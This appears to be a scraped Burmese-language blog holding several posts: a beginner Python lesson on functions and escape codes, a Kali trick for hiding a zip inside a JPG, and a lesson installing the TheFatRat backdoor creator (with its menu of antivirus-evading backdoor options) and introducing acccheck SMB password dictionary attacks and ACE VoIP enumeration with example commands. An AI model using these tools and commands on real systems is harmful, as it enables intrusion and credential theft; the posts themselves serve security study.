တစ္ေၾကာင္းစီ အေျဖကို ျမင္ရပါျပီ။ ဒါကေတာ့ print function ေလးပါ။ ေလးေၾကာင္းေျမာက္နဲ႔ ၅ေၾကာင္းေျမာက္ၾကားမွာ enter တစ္ေနရာစာ ျခားႏိုင္ဖို႔အတြက္ ေလးေၾကာင္းေျမာက္ လိုင္းရဲ႕ ေနာက္ဆံုးမွာ \n ဆိုတာေလး ထည့္ေရးထားတာ သတိျပဳမိမယ္ထင္ပါတယ္။ သီခ်င္းနဲ႔ မသက္ဆိုင္တဲ့ စာသားကို ျခားေပးလိုက္တာပါ။



Creating Functions (ဖန္ရွင္မ်ားကို ဖန္တီးျခင္း)
def ဆိုတဲ့ keyword နဲ႔  function block ေတြကို သတ္မွတ္ႏိုင္ပါတယ္။ သူ႔ရဲ႕ အသံုးျပဳပံုေလးကေတာ့ def name () : ပါ။ def ကိုအရင္ေရးရပါတယ္။ ျပီးရင္ space ျခားျပီး function name ကို သတ္မွတ္လို႔ ရပါတယ္။ ျပီးရင္ေတာ့ parentheses () နဲ႔ colon : တို႔ကို ထည့္သြင္းရပါမယ္။
e.g. def happyBirthdayEmily(): ေပါ့။
ခုန happy birthday သီခ်င္းေလးနဲ႔ ျပန္ျပီး ေပါင္းစပ္ရေအာင္။
နမူနာ ပရိုဂရမ္ေလးတစ္ခု ဆြဲဖို႔အတြက္ IDLE3 ကေန File>>>New ေလး ေခၚလိုက္ရေအာင္။
...........
#Simple print function

def happyBirthdayEmily ():
    print ("Happy Birthday to you!")
    print ("Happy Birthday to you!")
    print ("Happy Birthday, dear Emily.")
    print ("Happy Birthday to you! \n")
    print ("Hope you have a wonderful birthday!")
happyBirthdayEmily()
print ("Hope you have a wonderful birthday!")

...........
အထက္ပါအတိုင္း ကုဒ္ေလးေတြ ရိုက္ျပီးတဲ့အခါ day5 နာမည္နဲ႔ desktop ေပၚ Save ပါ။ RUN option ကေနပဲ RUN လိုက္ပါ။
ပံု၁ မွာ run ထားတဲ့ပံုစံ နမူနာ ျပထားပါေသးတယ္ဗ်။ RUN ျပီးလို႔ ေနာက္တစ္လိုင္းကူးသြားရင္ ဖန္ရွင္နာမည္ျဖစ္တဲ့ happyBirthdayEmily ကို ရိုက္ၾကည့္ပါဦး။ happy birthday သီခ်င္းစာသားေလးေတြ ျပန္ထြက္လာမွာျဖစ္ပါတယ္။
ကုဒ္ေတြကို ကူးမထည့္ပါနဲ႔ မိမိဘာသာ ရိုက္ပါ။ ကူးထည့္ျခင္းသည္ တတ္ေျမာက္မႈကို အေႏွာင့္အယွက္ေပးပါတယ္ခင္ဗ်။
..............
.............
Parameters in Functions
** Syntax
def functioname (parameters):
    "function-docstring"
    function-suite
    return [expression]
** return [expression] ဆိုတာကို ဖန္ရွင္ကို ေခၚသံုးသူအတြက္ ေဖာ္ျပခ်က္ကို ျပသျပီး ဖန္ရွင္ကေန ထြက္ခြာဖို႔ အသံုးျပဳပါတယ္။ သေဘာတရားကို ေျပာျပရတာက ခက္ပါတယ္။ လက္ေတြ႔ သံုးတဲ့အခါ နားလည္လာမွာပါ။

...........
Calling a Function
function တစ္ခုကို def သတ္မွတ္တဲ့ေနရာမွာ နာမည္ တစ္ခုပဲ အသံုးျပဳ သတ္မွတ္ေပးပါတယ္။ parameter ေတြမွာေတာ့ function, structures နဲ႔ blocks of code ေတြ ပါဝင္ႏိုင္ပါတယ္။ ဆိုလိုခ်င္တာက ဖန္ရွင္နာမည္တစ္ခု သတ္မွတ္တည္ေဆာက္ထားေပမယ့္ အထဲမွာ ပါဝင္တဲ့ parameter ေတြကေတာ့ အမ်ိဳးမ်ိဳး ကြဲျပားႏိုင္ပါတယ္။
ဖန္ရွင္တစ္ခုရဲ႕ အေျခခံ structure ကို finalized လုပ္တဲ့အခါ ဒီဖန္ရွင္ေတြကို အျခားဖန္ရွင္ေတြကေန တိုက္ရိုက္ ေခၚသံုးႏိုင္သလို pythom prompt ကေန ႀကံဳတဲ့အခါတိုင္း အလ်ဥ္းသင့္သလို ေခၚသံုးႏိုင္မွာ ျဖစ္ပါတယ္။ ကဲ printme() function ေလးကို ေခၚသံုးျပီး နမူနာ လုပ္ၾကည့္ရေအာင္ဗ်ာ.........
IDLE 3 မွာ new မေခၚဘဲ တိုက္ရိုက္ ေရးၾကည့္ရေအာင္
.........
>>> def printme(str):
"This prints a pased string into this function."
print (str)
return;

>>> printme("lm first call to user defined function!")
lm first call to user defined function!
>>> printme("Again second call to the same function!")
Again second call to the same function!
>>>
.......................
စာသားေတြထဲမွာ ထည့္ျပီး ရွင္းျပထားပါတယ္။ ျပန္ေျပာျပရမယ္ဆိုရင္
>>> def printme(str):                                    ဒါက အားလံုးသိတဲ့အတိုင္း def ကိုသံုးျပီး printme ဖိုင္ကို တည္ေဆာက္လိုက္ပါတယ္။
"This prints a pased string into this function."  str လို႔ ဆိုခဲ့တာေၾကာင့္ string အေနနဲ႔ စာသားကို ထည့္သြင္းလိုက္ပါတယ္။
print (str) ထည့္သြင္းလိုက္တဲ့ str ေလးကို print လုပ္လိုက္ပါတယ္
return; အဆံုးသတ္ဖို႔ ထည့္သြင္းလိုက္တဲ့ return ရဲ႕ ေနာက္မွာ semicolon ; ထည့္သြင္းခဲ့ျခင္းကို မေမ့ပါနဲ႔
ခုဆိုရင္ေတာ့ သတ္မွတ္ခ်က္ေလးေတြကို ထည့္သြင္းျပီးျပီမို႔ စတင္ေခၚၾကည့္လိုက္ပါတယ္။
>>> printme(I'm first call to user defined function!") printme ကို သတ္မွတ္ခဲ့စဥ္တုန္းက str နဲ႔ပဲ သတ္မွတ္ခဲ့တာမို႔ ဒီေနရာမွာ ျဖည့္သြင္းလိုက္မယ့္ string ကို ေဖာ္ျပေပးသြားမွာပါ။
I'm first call to user defined function! ဒီေနရာမွာ အေပၚက ျဖည့္သြင္းတဲ့ string ေပါ့
>>> printme("Again second call to the same function!") ေနာက္တစ္ေၾကာင္း ပထမနဲ႔ မတူေအာင္ ျဖည့္ျပီး ေခၚလိုက္ပါတယ္
Again second call to the same function! ေခၚလိုက္တဲ့အတိုင္းပဲ ထြက္ပါတယ္။
>>>
္ေျပာစရာရွိေကာင္းရွိလာႏိုင္ပါတယ္။ အဲလို တစ္ေၾကာင္းစီ ထုတ္ခ်င္တာမ်ား printme ကို သတ္မွတ္မေနဘဲ print နဲ႔ပဲ တိုက္ရိုက္ထုတ္ေပါ့ လို႔။ ေျပာစရာရွိလာပါတယ္။ print နဲ႔ပဲ တိုက္ရိုက္ထုတ္လို႔လည္း ရပါတယ္။
မတူညီတာက printme ဆိုတာ ကြ်န္ေတာ္တို႔ သတ္မွတ္လိုက္တဲ့ ဖန္ရွင္ျဖစ္ေနပါတယ္။ ေနာက္ထပ္ အသံုးဝင္တာေတြကိုေတာ့ ဆက္ျပီး ေလ့လာရေအာင္ပါ။
.....................................................
....................................................................................................

Python Programming
ဒီတစ္ခါေတာ့   Code Type အနည္းငယ္ကို ေဖာ္ျပေပးလိုပါတယ္။ \n ေရးရင္ ေနာက္တစ္လိုင္း enter ျခားေစတဲ့ ကုဒ္မ်ိဳးေလးေတြပါ။

Escape What it does
\\ Baskslash (\) ေရးမယ့္ string ထဲမွာ \ ထည့္ခ်င္တဲ့အခါ ဖန္ရွင္အျဖစ္ မသတ္မွတ္ေအာင္ \\ ေရးရတယ္
\' Single-quote(') ေရးမယ့္ string ထဲမွာ ' ထည့္ခ်င္တဲ့အခါ single quote သမားေတြပဲ ဒီလိုလုပ္ဖို႔ လိုတယ္။ Double Quotes နဲ႔ ေရးရင္ မလို
\" Double-quotes (") Double quotes ထဲမွာ " ထပ္ထည့္ခ်င္ရင္ ဥပမာ ကိုယ္ထုတ္ခ်င္တာက It is "apple". ဆိုပါေတာ့။ အတြင္းက " ေတြ ေပၚေအာင္ သံုးတယ္။
\a ASCII bell (BEL) Telephone ပံုေလး ေပၚတယ္
\b ASCII backspace (BS) print ("apple\bag") ေရးၾကည့္ရင္ သိမယ္။ \b ေနရာ ဘာေျပာင္းသြားမလဲဆိုတာ လုပ္ၾကည့္
\f ASCII formfeed (FF) print ("apple\flower") ေရးၾကည့္ အဲတိုင္းမထြက္ဘဲ \f ေနရာ ဘာဝင္လာမလဲ ဆိုတာမွတ္
\n ASCII linefeed (LF) ဒါကေတာ့ သိတယ္ enter လို႔ ေျပာတာ
\r Carriage Return (CR) print ("apple\ring") \r ေနရာမွာ ေျပာင္းသြားတာကို မွတ္ထား။ ကိုယ့္ဘာသာ လုပ္ၾကည့္မွ သိမွာ
\t Horizontal Tab (TAB) \t တစ္ခါထည့္ရင္ tab တစ္ခ်က္စာ ေရႊ႕တယ္။ print ("apple\t\t\torange")  စမ္းၾကည့္ပါ။

ဒီတိုင္း ေျပာျပတာက နားလည္ရခက္ပါလိမ့္မယ္။ ေအာက္ပါအတိုင္း ရိုက္ျပီး စမ္းၾကည့္ရေအာင္ပါ။
IDLE 3 ကို ဖြင့္ျပီး ေပၚလာတဲ့ Shell မွာ တိုက္ရိုက္ ရိုက္စမ္းၾကည့္ပါ။  ပံု ၂ မွာ နမူနာ ျပထားပါတယ္။
print ("ဒီထဲမွာ အေပၚက သေကၤတေတြ ပါေအာင္ ထည့္ရိုက္ၾကည့္ပါဒ")
example
print ("apple\new")
print ("aple\\new")
ဘာကြာလဲ သတိထားမိေအာင္ လုပ္ပါ။
......
ျပီးရင္ ေအာက္ပါ ေလ့က်င့္ခန္းေတြကို ေသခ်ာလုပ္ပါ။

A is a cat. B is a dog. C is a "cow".
A is in \app\tmp. B is in "house".
C is \run\hut.

အထက္ပါ စာသံုးေၾကာင္းအတိုင္း အတိအက် ထြက္ေစရန္  print သံုးျပီး တစ္ေၾကာင္းတည္း ေရးျပပါ။
အေျဖပံုကို chatbox ကေနသာ ပို႔ပါရန္။
.............................
ဒီေန႔အတြက္ေတာ့ ေနာက္ဆံုးအေနနဲ႔ input function ေလးနဲ႔ အဆံုးသတ္ပါမယ္။

Input Function  ဆိုရင္ သိျပီးသားျဖစ္ပါတယ္။
input("Enter your name.") စတဲ့ ပံုစံမ်ိဳး ကြ်န္ေတာ္တို႔ ေရးခဲ့ၾကပါတယ္။ သံုးလည္း သံုးခဲ့ၾကပါတယ္။ အဆင္လည္း ေျပခဲ့ၾကပါတယ္။
ဒုတိယ ေလ့က်င့္ခန္းအေနနဲ႔ input function မ်ား ပါဝင္တဲ့ program ေလးတစ္ခုကို ေရွ႕သင္ခန္းစာမ်ား လံုးဝ လံုးဝ ျပန္မၾကည့္ဘဲ ေရးရပါမယ္။
သင္ခန္းစာကေတာ့ ထုထည္ တြက္နည္း ျဖစ္ပါတယ္။ area.py ဆိုတာေလး သင္ခဲ့ရပါတယ္။ ဆင္တူေပါ့။
အခ်က္အလက္ နည္းနည္း ေပးပါမယ္။ ထုထည္ရဲ႕ ေဖာ္ျမဴလာက ေအာက္ေျခဧရိယာ x အျမင့္ ျဖစ္ပါတယ္။
Volume = A * H
A= Area (အလ်ား  x  အနံ) length * width
H= Heigh (အျမင့္)
ဒါေၾကာင့္
ထုထည္ = အလ်ား x အနံ x အျမင့္
Volume = length * width * heigh ျဖစ္ပါတယ္
သံုးခုေျမွာက္လို႔ ယူနစ္ သံုးထပ္ cubic unit ျဖစ္ပါတယ္။ cm ကို သံုးစမယ္ဆိုရင္ cubic cm ေပါ့။
အားလံုးပဲ ဒီအိမ္စာေလးကို လုပ္ႏိုင္မယ္ ထင္ပါတယ္



See U ဗ်ာ



 Thanks

Khit Minnyo
comments | | Read More...

ဓာတ္ပံု တစ္ပံုထဲမွာ ေဒတာေတြကို ဝွက္ရေအာင္ (Kali Linux Trick)

Penulis : KhitMinnyo on Monday, November 27, 2017 | November 27, 2017

Monday, November 27, 2017



Kali Linux
Hide Any Data Into Images

Data ကို image ဖိုင္တစ္ခုထဲမွာ hide မယ္ဆိုေတာ့ စိတ္ဝင္စားစရာေတာ့ ျဖစ္မယ္ထင္တယ္ေနာ္။ မည္သည့္ ေဒတာကို မဆို ဝွက္ႏိုင္ပါတယ္။
(Word, excel, powerpoint, exe, movie) ဘာမဆိုကို ဝွက္လို႔ရပါတယ္။ ပထမဆံုးအေနနဲ႔ hide_test ဆိုတဲ့ နာမည္နဲ႔ folder တစ္ခုကို ႀကိဳက္တဲ့ေနရာမွာ တည္ေဆာက္လိုက္ပါ။ ကြ်န္ေတာ္ကေတာ့ Desktop မွာပဲ ေရြးလိုက္ပါတယ္။ ဖိုဒါ နာမည္ကို မိမိႏွစ္သက္ရာ ေပးႏိုင္ပါတယ္။ space မျခားရပါဘူး။ ကြ််န္ေတာ္က ပံုတစ္ပံုထဲမွာ mp3 တစ္ခုကို ဝွက္ျပီး ထည့္မွာမို႔ ခုန folder ထဲကို ပံုတစ္ပံုနဲ႔ သီခ်င္းတစ္ပုဒ္ ထည့္လိုက္ပါတယ္။
ျပီးတဲ့အခါ compress type မွာ zip ေရြးလိုက္ပါတယ္။ နာမည္ကို mp3 ပဲ ထားျပီး enter လိုက္ပါတယ္။ ဒီသင္ခန္းစာထဲမွာပါတဲ့ ပံု compress.png နဲ႔ compress2.png မွာ ၾကည့္ႏိုင္ပါတယ္။

zip နဲ႔ image ၂ခုေတာ့ အသင့္ ရွိေနပါျပီ။ အဲသည္ folder ထဲကို Terminal ကေန ဝင္ေရာက္လိုက္ပါတယ္။

root@kmn:~/Desktop/hide_test# ls
mp3.zip  pl.jpg  ဗင္းဆင့္ဗန္ဂိုးတမ္းခ်င္း.mp3
root@kmn:~/Desktop/hide_test#

ျဖန္႔ခ်ၾကည့္တဲ့အခါမွာေတာ့ အထက္ပါအတိုင္း ေတြ႕ရမွာျဖစ္ပါတယ္။ ဖိုင္ သံုးခု ရွိတာ ေသခ်ာ ျမင္ရပါျပီ။ အဲမွာ ျပန္ေျပာျပခ်င္တာက ကြ်န္ေတာ္ ဝွက္ခ်င္တာက mp3.zip ျဖစ္သြားပါျပီ။ ဒီဘက္က သီခ်င္းမဟုတ္ေတာ့ပါဘူး။ ထည့္ဝွက္မယ့္ ဖိုင္က pl.jpg ဆိုတဲ့ ပံုေလးတစ္ပံု ထဲမွာေပါ့။ Terminal ထဲကေနျပီးပဲ ဆက္ရေအာင္ဗ်

root@kmn:~/Desktop/hide_test# cat pl.jpg mp3.zip >finish.jpg

ဆိုျပီး ရိုက္လိုက္ပါတယ္။ cat ကို အသံုးျပဳ ျပီး pl.gpg ထဲကိ mp3.zip ထည့္မယ္ ထြက္လာမယ့္ဖုိင္က finish.jpg ဆိုတာျဖစ္မယ္ေပါ့။ ဖိုင္နာမည္ေတြက ကိုယ့္ဘာသာ ထည့္ထားတဲ့ဖိုင္ကို အသံုးျပဳႏိုင္ပါတယ္။ တစ္ခုပဲ သတိထားရမွာက ဖိုင္နာမည္ေတြမွာ space ခ်ဲမထားရပါဘူး။ ေနာက္တစ္ခ်က္ ေျပာခ်င္တာက file type မလြဲေအာင္ ရိုက္ဖို႔ လိုပါတယ္။ .jpg .zip စတာေတြ လြဲလို႔မရပါဘူး။
ခုဆိုရင္ေတာ့ ကြ်န္ေတာ္တို႔ folder ထဲမွာ ဖိုင္ သံုးခုမဟုတ္ေတာ့ပါဘူး။ ဖိုင္ ေလးခု ျဖစ္သြားပါျပီ။ finish.jpg ကလြဲရင္ က်န္တဲ့ဖိုင္ေတြကို ဖ်က္လိုက္လို႔ ရပါျပီ။ ls နဲ႔ေဖာ္ၾကည့္ရင္ ကြ်န္ေတာ္ ေပါင္းစပ္ထားတဲ့ ဖိုင္တစ္ဖိုင္ကိုပဲ ေတြ႕ရေတာ့မွာျဖစ္ပါတယ္။

root@kmn:~/Desktop/hide_test# ls
finish.jpg
root@kmn:~/Desktop/hide_test#

ကဲ ျပန္ျဖည္ရေအာင္။ ဘယ္လိုျပန္ျဖည္မလဲ။ လြယ္ပါတယ္။ unzip command ေလးနဲ႔ အလြယ္တကူ ျဖည္ႏိုင္ပါတယ္။ ဖြင့္ထားတဲ့ terminal ေတြပါ ပိတ္လိုက္ပါ။ ျပီးရင္ သူ႔ folder ထဲကို ျပန္ဝင္ပါမယ္။


root@kmn:~# cd Desktop ပထမဆံုး desktop ကို အရင္ ဝင္လိုက္ပါတယ္
root@kmn:~/Desktop# cd hide_test သူ႔ကို ဖန္တီးထားတဲ့ folder ထဲ ထပ္ဝင္လိုက္ပါတယ္
root@kmn:~/Desktop/hide_test# ls ျဖန္႔ၾကည့္လိုက္ေတာ့ ေအာက္ပါတစ္ဖိုင္ပဲ ရွိေသးတာ ေတြ႕ရပါမယ္
finish.jpg
root@kmn:~/Desktop/hide_test# unzip finish.jpg   ျဖည္လိုက္တာပါ
Archive:  finish.jpg
warning [finish.jpg]:  394508 extra bytes at beginning or within zipfile
  (attempting to process anyway)
  inflating: ဗင္းဆင့္ဗန္ဂိုးတမ္းခ်င္း.mp3 
root@kmn:~/Desktop/hide_test# ခုေနမွာ ျဖန္႔ၾကည့္ရင္ ခုန ဝွက္ထားတဲ့ သီခ်င္းဖိုင္ကို ေတြ႕ရျပီျဖစ္ပါတယ္

စမ္းသပ္ၾကည့္ၾကပါ။
....................................................................................................
....................................................................................................


Thanks


Khit Minnyo
comments | | Read More...

Installing The Fat RAT & Introduction to Information Gathering tools (ျမန္မာလို)




Kali Linux
1. Installing The Fat RAT

ဒီေန႔ သင္ခန္းစာမွာေတာ့ ပထမဆံုးအေနနဲ႔ ထည့္သြင္းဖို႔ လိုအပ္တာက TheFatRat ပါ။ ေဒါင္းယူရမယ့္ လိပ္စာေလး ေပးလိုက္ပါတယ္။ Day 4 ရဲ႕ ေနာက္ဆံုး သင္ခန္းစာမွာ ေဒါင္းဖို႔ ေျပာထားျပီးသားမို႔ ေဒါင္းျပီးသားသူေတြက ေဒါင္းစရာမလိုအပ္ေတာ့ပါဘူး။ install လုပ္ရမယ့္အဆင့္ကို ဖတ္လိုက္ပါ။ မေဒါင္းရေသးတဲ့သူေတြက
https://github.com/Screetsec/TheFatRat မွာ ေဒါင္းယူရမွာျဖစ္ပါတယ္။ အစိမ္းေရာင္ download ခလုတ္ကို ႏွိပ္ျပီး ေဒါင္းယူရမွာျဖစ္ပါတယ္။  terminal ကေန ေဒါင္းယူခ်င္ရင္ေတာ့ ပထမဆံုးအေနနဲ႔
location  တစ္ခုခုေပၚ (example) Desktop ေပၚကို ေရြးယူထားလိုက္ရပါမယ္။

cd Desktop
git clone https://github.com/Screetsec/TheFatRat.git
အထက္ပါ command ကို အသံုးျပဳျပီး terminal ကေန ေဒါင္းယူႏိုင္မွာျဖစ္ပါတယ္။ ရလာတဲ့ zip ဖိုင္ကို Right Click ႏွိပ္ျပီး extract here လိုက္မယ္ရင္ေတာ့ Desktop ေပၚမွာ TheFatRat  ဆိုတဲ့ နာမည္နဲ႔ folder တစ္ခုကို ေတြ႕ျမင္ရမွာျဖစ္ပါတယ္။
အထက္ပါ folder ကို ဖြင့္လိုက္ပါ။ ျပီးရင္ လြတ္တဲ့ေနရာမွာ R-click ႏွိပ္ျပီး open in terminal ကို ေရြးလိုက္ပါ။ (သို႔မဟုတ္ terminal ကေနပဲ cd ကို အသံုးျပဳျပီး folder ထဲ ေရာက္ေအာင္ဝင္ပါ။) ဒီထိ ထပ္ရွင္းျပစရာမလိုေလာက္ေတာ့ဘူးလို႔ ထင္ပါတယ္။ အထက္ပါအတိုင္း ဝင္ေရာက္ျပီးျပီဆိုရင္ေတာ့ ls နဲ႔ ဖြင့္ၾကည့္ရင္ သူ႔ထဲမွာ ရွိတဲ့ ဖိုင္ေတြ list နဲ႔ တက္လာမွာျဖစ္ပါတယ္။
install လုပ္ရမယ့္အဆင့္ေတြကေတာ့

chmod +x fatrat
chmod +x powerfull.sh
chmod +x setup.sh
ျပီးရင္ေတာ့ setup ဖိုင္ကို run ပါမယ္။ run တာက ./ ေနာ္
./setup.sh
ဒီအထိ ျပီးရင္ေတာ့
_   _____/_____  _/  |_\______   \_____  _/  |_ 
 |    __)  \__  \ \   __\|       _/\__  \ \   __\
 |     \    / __ \_|  |  |    |   \ / __ \_|  | 
 \___  /   (____  /|__|  |____|_  /(____  /|__| 
     \/         \/              \/      \/       
                 ____    ________               
                /_   |  /   __   \               
                 |   |  \____    /               
                 |   |     /    /               
                 |___| /\ /____/                 
                       \/                       

          Setup Script for FATRAT 1.9     
 [ ✔ ] Xterm.............................[ found ]
 [ ✔ ] Dns-Utils ........................[ found ]
 [ ✔ ] Zenity............................[ found ]
 [ ✔ ] Gcc compiler......................[ found ]
 [ X ] Monodevelop  -> not found
 [ ! ]  Installing monodevelop
ဆိုျပီး ေပၚလာမွာျဖစ္ျပီး ေနာက္ထပ္ terminal box တစ္ခုမွာ install progress ကို ေတြ႕ျမင္ရပါမယ္။ ofline မဟုတ္တဲ့အတြက္ အင္တာနက္လိုင္း ရွိေနဖို႔ လိုအပ္ပါတယ္။
install အဆင့္က ေတာ္ေတာ္ၾကာတာမို႔ စိတ္ရွည္ရွည္ ေစာင့္ဖို႔ လိုအပ္ပါတယ္။ 100% ျပည့္မွ finish ျဖစ္ပါမယ္။
FatRat တင္ျပီးတဲ့အခါ ေခၚၾကည့္ရင္ ဒီလို ျမင္ရပါမယ္

        ____
        |    |
        |____|
       _|____|_       _____ _       _____     _   _____     _     
        /  ee\_      |_   _| |_ ___|   __|___| |_| __  |___| |_   
      .<     __O       | | |   | -_|   __| .'|  _|    -| .'|  _|
     /\ \.-.' \        |_| |_|_|___|__|  |___|_| |__|__|___|_| 
    J  \.|'.\/ \                 
    | |_.|. | | |   [--]   Backdoor Creator for Remote Acces [--]
     \__.' .|-' /   [--]  Created by: Edo Maland (Screetsec) [--]
     L   /|o'--'\   [--]            Version: 1.9.2           [--]
     |  /\/\/\   \  [--]          Codename: Whistle          [--]   
     J /      \.__\ [--]   Follow me on Github: @Screetsec   [--]
     J /      \.__\ [--]   Dracos Linux : @dracos-linux.org  [--]
     |/         /   [--]         [--]
       \      .'\.  [--]     SELECT AN OPTION TO BEGIN:      [--] 
    ____)_/\_(___\. [--] .___________________________________[--]
   (___._/  \_.___)'\_.-----------------------------------------/

 
[01]  Create Backdoor with msfvenom
[02]  Create Fud 100% Backdoor [Slow but Powerfull]
[03]  Create Fud Backdoor with Avoid v1.2 
[04]  Create Fud Backdoor with backdoor-factory [embed]
[05]  Backdooring Original apk [Instagram, Line,etc]
[06]  Create Fud Backdoor 1000% with PwnWinds [Excelent]
[07]  Create Backdoor For Office with Microsploit
[08]  Create auto listeners 
[09]  Jump to msfconsole 
[10]  Searchsploit 
[11]  File Pumper [Increase Your Files Size]
[12]  Cleanup 
[13]  Help 
[14]  Credits 
[15]  Exit 

 ┌─[TheFatRat]──[~]─[menu]:
 └─────►


..........................................................................................................................
..........................................................................................................................
ကြ်န္ေတာ္တို႔ေတြမွာလည္း ႀကိဳတင္ျပင္ဆင္တာေတြ မ်ားေနတယ္။ ခုထိကို ဟုတ္တိပတ္တိ ဘာမွ မလုပ္ရေသးဘူးျဖစ္ေနတယ္ေနာ္။ ျပင္ဆင္တဲ့အပိုင္း မျပီးေသးဘူးလား လို႔ ေမးခ်င္တဲ့သူ ရွိေကာင္းရွိပါမယ္။
ဒီေမးခြန္းေလးကို ဒီလိုေျဖၾကည့္ခ်င္ပါတယ္။
Kali Linux ခု ကြ်န္ေတာ္တို႔ သံုးေနတဲ့  26.2 Version မွာ tools ေတြ အမ်ားႀကီး built-in ပါေနတာကို သတိထားမိၾကတယ္ေနာ္။ ကြ်န္ေတာ္တို႔ ကိုယ္တိုင္လည္း ေတြ႕ဖူးေနတယ္။ ေကာင္းျပီ။
ခုပဲ all application menu ကို ဖြင့္ျပီး  Folder 1 (Information Gathering) ကို ၾကည့္လိုက္ရေအာင္။ ယခု သင္ခန္းစာ folder ထဲမွာ ပူးတြဲပါတဲ့  pic1 ကို ၾကည့္ပါ။ မိမိတို႔စက္ထဲမွာလည္း အဲအတိုင္းပဲ ျဖစ္ပါမယ္။ ပံုထဲမွာ arrow နဲ႔ျပ ထားတဲ့ ပထမဆံုး tool ကို ၾကည့္ပါ။ 0trace ျဖစ္ပါတယ္။ ဖြင့္ၾကည့္ပါ။ ဘာေပၚလာတာကို ျမင္ရပါသလဲ။  terminal ပဲ ေပၚလာတာကို ေတြ႕ရပါလိမ့္မယ္။
အဲသည္ terminal မွာပဲ  0trace လို႔ ရိုက္ၾကည့္လိုက္ပါဦး။ ျပီးရင္ enter ေပါ့။ ဘာေတြ႕ရပါသလဲ။
root@kali:~# 0trace
bash: 0trace: command not found
ဆိုျပီး မရွိဘူးဆိုတာ ေတြ႕ရပါလိမ့္မယ္။
Information Gathering (အခ်က္အလက္ စုေဆာင္းျခင္း) အုပ္စုထဲမွာ ပါဝင္တဲ့ tools ေတြ ကို ေအာက္မွာ ေဖာ္ျပေပးထားပါတယ္။

Information Gathering

    acccheck     ace-voip    Amap    Automater     bing-ip2hosts
    braa     CaseFile CDPSnarf cisco-torch     Cookie Cadger
    #copy-router-config DMitry dnmap dnsenum     dnsmap
    DNSRecon dnstracer dnswalk DotDotPwn     enum4linux
    enumIAX Faraday Fierce Firewalk     fragroute
    fragrouter Ghost Phisher   GoLismero goofile     hping3
    #ident-user-enum    InTrace iSMTP lbd     Maltego Teeth
    masscan Metagoofil      Miranda          nbtscan-unixwiz    Nmap
    ntop p0f         Parsero          Recon-ng      SET
    smtp-user-enum      snmp-check      SPARTA           sslcaudit     SSLsplit
    sslstrip         SSLyze         THC-IPV6 theHarvester     TLSSLed
    twofi         URLCrazy Wireshark WOL-E     Xplico
Kali Linux မွာ အသံုးျပဳႏိုင္တဲ့ Information Gathering Tools ေတြပါ။ ၆၀ တိတိ ရွိပါတယ္။ ဒါေပမယ့္ ကြ်န္ေတာ္တို႔ သံုးရမွာ ခုေဖာ္ျပထားတဲ့အတိုင္းေတာ့ မဟုတ္ပါဘူး။ နည္းနည္း ရႈပ္သြားျပီထင္တယ္။
ကဲ ဒါဆိုရင္  AccCheck အေၾကာင္းကို အရင္ဆံုးေျပာရေအာင္။
root@kali:~# acccheck
သူ႔ကို အလြယ္ကူဆံုး ရွင္းျပရမယ္ဆိုရင္ေတာ့ သူက Dictionary ကို အသံုးျပဳျပီး Passwword Guessing Attack လုပ္တာေပါ့။ Admin Acc ရဲ႕ user name ေတြနဲ႔ passwords ေတြကို ယွဥ္တြဲႏိုင္ေအာင္ ၾကိဳးစားေပးတဲ့ tools ျဖစ္ပါတယ္။ The tool is designed as a password dictionary attack tool that targets windows authentication via the SMB protocol. လို႔ သူ႔ရဲ႕ မူလWeb မွာ ေဖာ္ျပထားပါတယ္။ SMB protocol ကေန target ရဲ႕ windows authenication ကို ရယူလိုတဲ့အခါ Password dictionary attack လုပ္လို႔ရေအာင္ ေရးဆြဲထားတဲ့ tools ေပါ့။

-t [single host IP address] ဒါကေတာ့ ရွင္းပါတယ္။ IP တစ္ခုတည္းကို မူေသ သတ္မွတ္ႀကိဳးစားျခင္းျဖစ္ျပီး
OR
-T [file containing target ip address(es)] ဒါကေတာ့ IP Address ေတြ ပါဝင္ေနတဲ့ ဖိုင္ကို အသံုးျပဳျပီး ႀကိဳးစားတာ ျဖစ္ပါတယ္

Optionalေတြကေတာ့
-p [single password]
-P [file containing passwords]
-u [single user]
-U [file containing usernames]
-v [verbose mode]

Examples
Attempt the 'Administrator' account with a [BLANK] password.
acccheck -t 10.10.10.1

Attempt all passwords in 'password.txt' against the 'Administrator' account.
acccheck -t 10.10.10.1 -P password.txt

Attempt all password in 'password.txt' against all users in 'users.txt'.
acccehck -t 10.10.10.1 -U users.txt -P password.txt

Attempt a single password against a single user.
acccheck -t 10.10.10.1 -u administrator -p password

...............................................................................................................................
ေနာက္တစ္ခု က ace
ACE VoIP Directory Tool ေပါ့။

ACE (Automated Corporate Enumerator)ဆိုတာက ဖုန္းရဲ႕ Screen interface ေပၚမွာ ေဖာ္ျပႏိုင္တဲ့ entry ေတြ name ေတြကို download ရယူႏိုင္ေစဖုိ႔အတြက္ IP Phone တစ္ခုရဲ႕  Behavior ကို အတုလုပ္ ေဖာ္ျပႏိုင္စြမ္းရွိတဲ့ tool တစ္ခုျဖစ္ပါတယ္။ powerful VoIP Corporate Directory enumeration tool လို႔ ဆိုႏိုင္ပါတယ္။
automate VoIP attacks ေတြကို ျပဳလုပ္ႏိုင္ဖို႔ ဖန္တီးထားတဲ့ tool တစ္ခုျဖစ္ပါတယ္။ ACE ကေန VoIP corporate directory ေတြကို ေဒါင္းယူႏိုင္ဖို႔အတြက္ DHCP, TFTP, and HTTP ေတြကို သံုးျပီး  အလုပ္လုပ္ပါတယ္။ Directory ေတြကိုလည္း text file အေနနဲ႔ ထုတ္ေပးတယ္။ အျခား VoIP Assessment Tools ေတြနဲ႔ အလုပ္လုပ္ႏိုင္တဲ့ text file အျဖစ္ေပါ့။

ACE ကို ပံုစံ ႏွစ္မ်ိဳးနဲ႔ အသံုးျပဳႏိုင္ပါတယ္။ ပထမတစ္မ်ိဳးက DHCP ကေနတစ္ဆင့္ TFTP Server IP Address ကို အလိုအေလ်ာက္ ရွာေဖြေပးတာျဖစ္ျပီး ေနာက္တစ္ခုကေတာ့ command line parameter အျဖစ္ TFTP Server IP address ကို user က သတ္မွတ္ေပးႏိုင္တာျဖစ္တယ္။ အဲဒီအတြက္ေတာ့ Mac Address ကို သိဖို႔ လိုအပ္ျပီး -m option ကို အသံုးျပဳရပါလိမ့္မယ္။
Usage: ace [-i interface] [ -m mac address ] [ -t tftp server ip address | -c cdp mode | -v voice vlan id | -r vlan interface | -d verbose mode ]

-i (Mandatory) Interface for sniffing/sending packets
-m (Mandatory) MAC address of the victim IP phone
-t (Optional) tftp server ip address
-c (Optional) 0 CDP sniff mode, 1 CDP spoof mode
